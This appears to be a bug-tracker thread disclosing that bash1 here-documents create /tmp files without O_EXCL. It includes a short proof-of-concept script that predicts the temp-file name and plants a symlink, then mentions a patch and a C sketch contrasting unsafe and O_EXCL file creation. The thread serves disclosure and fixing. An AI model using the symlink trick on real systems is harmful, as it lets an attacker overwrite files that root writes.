I've read a mail from BUGTRAQ written by Paul Szabo (http://www.securityfocus.com/templates/archive.pike?list=1&mid=146657) about the sh << vulnerability (the same as the tcsh vulnerability). I've tested it under redhat/i386 6.2. bash1 contains the same bug: it incorrectly creates temporary files (without the O_EXCL flag). Probably other redhat versions are affected too.

#!/bin/bash
# state before the here-document is processed
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/t$[$$+3]-sh
cat <<EOF
Only root can create /etc/nologin. Do any boot-time scripts use sh?
EOF
# state after the here-document is processed
ls -l /tmp/nologin
cat /tmp/nologin

I've checked this with bash2; it isn't vulnerable (bash2 uses the O_EXCL flag when creating tmp files).
Created attachment 5702: Proposed fix
Working on it - the patch I've attached should fix the problem.
Created attachment 5703: Fixed patch
Oops, forgot about the umask().
Update released.
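
Added example (not the attached patch, which is not shown on this page, and not bash's own code): a C sketch contrasting temporary-file creation without O_EXCL, as described in the report, with an O_EXCL open under a restrictive umask, as the later comment mentions. The function names and the demo directory and file names are constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak form: no O_EXCL, so a symlink planted at `path` is followed. */
int create_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: O_EXCL fails with EEXIST if anything, including a
 * dangling symlink, already exists at `path`. */
int create_excl(const char *path) {
    mode_t old = umask(077);   /* strip group/other bits whatever the mode */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    int saved = errno;
    umask(old);
    errno = saved;
    return fd;
}

/* Returns 0 if all three observations hold, else the failing step. */
int demo(void) {
    char dir[] = "/tmp/excl-demo-XXXXXX";   /* private scratch directory */
    char link[64], target[64];
    struct stat st;
    int fd, rc = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(link, sizeof link, "%s/t1234-sh", dir);   /* constructed name */
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, link) != 0) return -1;
    fd = create_weak(link);    /* 1: weak open creates the link's target */
    if (fd < 0 || stat(target, &st) != 0) rc = 1;
    if (fd >= 0) close(fd);
    unlink(target);
    fd = create_excl(link);    /* 2: O_EXCL refuses the pre-existing link */
    if (!rc && !(fd < 0 && errno == EEXIST && lstat(target, &st) != 0)) rc = 2;
    if (fd >= 0) close(fd);
    unlink(link);
    fd = create_excl(link);    /* 3: fresh name gives an owner-only file */
    if (!rc && !(fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600)) rc = 3;
    if (fd >= 0) close(fd);
    unlink(link); unlink(target); rmdir(dir);
    return rc;
}

int main(void) { int rc = demo(); printf("demo: %d\n", rc); return rc; }
```

The demo works inside a directory from mkdtemp() so it touches nothing else under /tmp; a return value of 0 means the weak open wrote through the link, the O_EXCL open was refused, and the fresh file came out with mode 0600.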